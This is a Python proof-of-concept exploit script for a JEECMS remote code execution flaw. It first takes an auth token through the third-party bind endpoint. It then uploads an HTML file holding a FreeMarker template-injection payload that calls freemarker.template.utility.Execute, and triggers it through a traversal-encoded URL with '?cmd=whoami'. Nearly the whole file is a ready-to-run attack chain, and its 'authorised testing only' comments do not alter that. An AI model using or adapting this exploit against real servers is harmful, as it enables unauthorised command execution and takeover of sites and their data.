#!/usr/bin/python
# -*- coding:utf-8 -*-
import requests
import sys
import json
import os
import time
import string
import argparse
import readchar
import random
from requests_toolbelt.multipart.encoder import MultipartEncoder
# Alphabet used for the throw-away usernames sent to the target (ASCII letters only).
chars = string.ascii_lowercase + string.ascii_uppercase
def random_string_generator(str_size, allowed_chars):
    """Return a string of ``str_size`` characters drawn uniformly from ``allowed_chars``.

    Uses ``random.choice`` once per character, so the output is NOT suitable as a
    secret (use ``secrets`` for that); here it only needs to be a unique-looking
    username.  A non-positive ``str_size`` yields the empty string.
    """
    picked = []
    for _ in range(str_size):
        picked.append(random.choice(allowed_chars))
    return "".join(picked)
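def getToken(url):
    """Obtain a ``JEECMS-Auth-Token`` by binding a throw-away third-party login.

    POSTs a JSON body with a random 5-letter username to ``<url>/thirdParty/bind``
    and extracts ``data.JEECMS-Auth-Token`` from the JSON reply.

    Args:
        url: Base URL of the target (scheme + host[:port], no trailing path).

    Returns:
        The token string, or ``None`` when the endpoint does not answer 200 or the
        reply body does not have the expected shape.  Never raises on a malformed
        reply; network errors from ``requests`` propagate to the caller.
    """
    target = url + "/thirdParty/bind"
    # Content-Length is intentionally not set by hand: requests derives it from
    # the encoded body.  The previous hard-coded value did not match the actual
    # body length and could make the server truncate or reject the request.
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'X-Requested-With': 'XMLHttpRequest',
    }
    data = {
        "username": random_string_generator(5, chars),
        "loginWay": 1,
        "loginType": "QQ",
        "thirdId": "abcdefg",
    }
    # verify=False accepts any certificate (PoC targets are often self-signed);
    # this also means the exchange can be intercepted.  Only point this at hosts
    # you are authorised to test.  The timeout keeps a silent target from
    # hanging the script forever.
    response = requests.post(url=target, headers=headers, json=data, verify=False, timeout=15)
    if response.status_code != 200:
        print("get token error")
        return None
    try:
        token = json.loads(response.text)['data']['JEECMS-Auth-Token']
    except (ValueError, KeyError, TypeError):
        # Non-JSON body, or JSON without data.JEECMS-Auth-Token.
        print("get token error: unexpected response body")
        return None
    if not token:
        print("get token error: empty token")
        return None
    print("JEECMS-Auth-Token: {}".format(token))
    return token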
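def getPath(url, token):
    """Upload a FreeMarker template payload and return the server-side path it was stored at.

    Sends a multipart POST to ``<url>/member/upload/o_upload`` authenticated with the
    ``JEECMS-Auth-Token`` header; the uploaded file ``b.html`` contains a FreeMarker
    expression that resolves ``freemarker.template.utility.Execute`` through the class
    loader of the ``site`` template variable and runs the ``cmd`` request parameter.

    Args:
        url: Base URL of the target (scheme + host[:port], no trailing path).
        token: Value for the ``JEECMS-Auth-Token`` header, as returned by ``getToken``.

    Returns:
        The ``data.fileUrl`` string from the JSON reply, or ``None`` when ``token`` is
        missing, the endpoint does not answer 200, or the reply body does not have the
        expected shape.  Network errors from ``requests`` propagate to the caller.
    """
    if not token:
        # Without a token the upload is unauthenticated; do not send a header with a
        # None value (older requests versions raise, newer ones silently drop it).
        print("get path error: no token")
        return None
    target = url + "/member/upload/o_upload"
    shellCode = '''${site.getClass().getProtectionDomain().getClassLoader().loadClass("freemarker.template.ObjectWrapper").getField("DEFAULT_WRAPPER").get(null).newInstance(site.getClass().getProtectionDomain().getClassLoader().loadClass("freemarker.template.utility.Execute"), null)(cmd)}'''
    boundary = '-----------------------------1250178961143214655620108952'
    multipart_encoder = MultipartEncoder(
        fields={
            "uploadFile": ("b.html", shellCode, 'text/html'),
            "typeStr": "File",
        },
        boundary=boundary,
    )
    # The boundary in Content-Type must match the encoder's; Content-Length is left
    # to requests/the encoder (the previous hard-coded 606 was not tied to the
    # actual body size and could corrupt the request).
    headers = {
        'Content-Type': 'multipart/form-data; boundary=' + boundary,
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'X-Requested-With': 'XMLHttpRequest',
        'JEECMS-Auth-Token': token,
    }
    # verify=False: see getToken; authorised testing only.
    response = requests.post(url=target, headers=headers, data=multipart_encoder, verify=False, timeout=30)
    if response.status_code != 200:
        print("get path error")
        return None
    try:
        path = json.loads(response.text)['data']['fileUrl']
    except (ValueError, KeyError, TypeError):
        # Non-JSON body, or JSON without data.fileUrl.
        print("get path error: unexpected response body")
        return None
    if not path:
        print("get path error: empty fileUrl")
        return None
    return path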
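def verify(target_url):
    """Run the full chain (token -> upload -> trigger) and return the command output.

    The uploaded file's ``fileUrl`` has every ``/`` replaced by ``-`` and is appended
    to a ``/..-..-..-..-..`` prefix — the target-specific encoding the original PoC
    relies on to reach the uploaded template (not independently verified here).  The
    trailing ``.html`` is turned into ``.htm`` before requesting it with
    ``?cmd=whoami``.

    Args:
        target_url: Base URL of the target (scheme + host[:port], no trailing path).

    Returns:
        The body of the trigger request as text, or ``None`` if either the token or
        the upload step failed.  Note that any response body counts as "output" —
        a 404 page is returned just like real command output, so inspect it.
    """
    token = getToken(url=target_url)
    if not token:
        return None
    time.sleep(1)
    path = getPath(target_url, token)
    if not path:
        # Previously this crashed with AttributeError on None.replace(...).
        return None
    time.sleep(1)
    encoded = path.replace("/", "-")
    url = target_url + "/..-..-..-..-.." + encoded
    print("resultUrl: ", url)
    # Only rewrite the file extension.  A blanket replace("html", "htm") would
    # also mangle any "html" inside the host name or path prefix.
    if url.endswith(".html"):
        url = url[:-len(".html")] + ".htm"
    cmdurl = url + "?cmd=whoami"
    # verify=False: see getToken; authorised testing only.
    return requests.get(cmdurl, verify=False, timeout=15).text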
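if __name__ == "__main__":
    # Entry point: python JEECMS-o_upload-upload.py http://host[:port]
    if len(sys.argv) < 2:
        print("usage: {} http://target[:port]".format(sys.argv[0]))
        sys.exit(1)
    # A trailing slash would otherwise produce "//thirdParty/bind" style paths.
    target = sys.argv[1].rstrip("/")
    data = verify(target)
    # Any non-empty body is reported as success; an error page satisfies this
    # too, so read the printed output rather than trusting the [+] alone.
    if data:
        print("[+]漏洞存在,执行 whoami 的结果为:", data)
    else:
        print("[-]漏洞不存在")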